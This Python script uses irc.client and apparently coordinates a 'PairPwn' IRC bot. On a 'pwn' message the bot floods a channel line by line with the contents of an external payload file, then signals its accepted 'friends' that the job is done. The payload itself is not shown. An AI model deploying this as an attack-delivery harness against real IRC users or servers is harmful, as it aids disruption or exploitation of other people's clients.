#! /usr/bin/env python
#
# Example program using irc.client.
#
# This program is free without restrictions; do anything you like with
# it.
#
# Joel Rosdahl <joel@rosdahl.net>

from time import sleep
import irc.client
import sys

class PairPwn(irc.client.SimpleIRCClient):
    friends = []
    channels = []
    status = None

    def __init__(self, channel, payloadPath, reportChannel=None):
        irc.client.SimpleIRCClient.__init__(self)
        self.channel= channel
        self.payload= payloadPath
        self.reportChannel = reportChannel
        self.status = "init"


    def on_welcome(self, connection, event):
        self.status = "welcomed"
        print(connection.nickname + " was welcomed")
        if self.reportChannel:
           connection.join(self.reportChannel)
        connection.join(self.channel)

    def on_join(self, connection, event):
        print(connection.nickname + " joined " + str(event.target))
        if event.target == self.channel and "Romeo" in connection.nickname:
           self.status = "ready"
        else:
           connection.privmsg(event.target, "I'm here!")

    def on_disconnect(self, connection, event):
        print(connection.nickname + " tries to disconnect")
        print("status is ["+self.status+"]")
        sys.exit(1)

    def on_privmsg(self, connection, event):
        print(connection.nickname + " recv " + str(event.arguments))
        if event.arguments[0] == "done":
           self.connection.quit()
           return
        elif "add friend" in event.arguments[0]:
          friend = event.source[:event.source.index("!")]
          if friend not in self.friends:
             print("Accepted friend request from " + friend)
             self.friends.append(friend) 
        elif "pwn" in event.arguments[0] and self.status == "ready":
          self.sendPayload()

    def sendPayload(self):
        print("Sending Payload")
        for line in open(self.payload).readlines():
            self.connection.privmsg(self.channel, line.replace("\n", ""))
        
        sleep(30)
        
        for friend in self.friends:
           print("Telling " + friend + "...")
           self.connection.privmsg(friend, "done")
           self.status = "launched payload"
        self.connection.quit("Using irc.client.py")

def makeBot(server, port, nick, target="", fin = "pwn.raw"):
    print("Crafting a Bot namend " +  nick)
    c = PairPwn(target, fin)
    try:
        c.connect(server, port, nick)
    except irc.client.ServerConnectionError as x:
        print(x)
        return 
    return c

def main():
    if len(sys.argv) != 5:
        args =""
        for arg in sys.argv:
          args += " " + arg
        print("[" +args + "] is invalid")
        print("Usage: luvbot <server[:port]> <nickname> <target> <file>")
        print("\ntarget is a nickname or a channel.")
        print("Trying to exit")
        sys.exit(1)

    s = sys.argv[1].split(":", 1)
    server = s[0]
    if len(s) == 2:
        try:
            port = int(s[1])
        except ValueError:
            print("Error: Erroneous port.")
            print("Trying to exit")
    else:
        port = 6667
    fin = sys.argv[4]
    target = sys.argv[3]
    nickname = sys.argv[2]
    makeBot(server, port, nickname, target, fin).start()

if __name__ == "__main__":
    main()
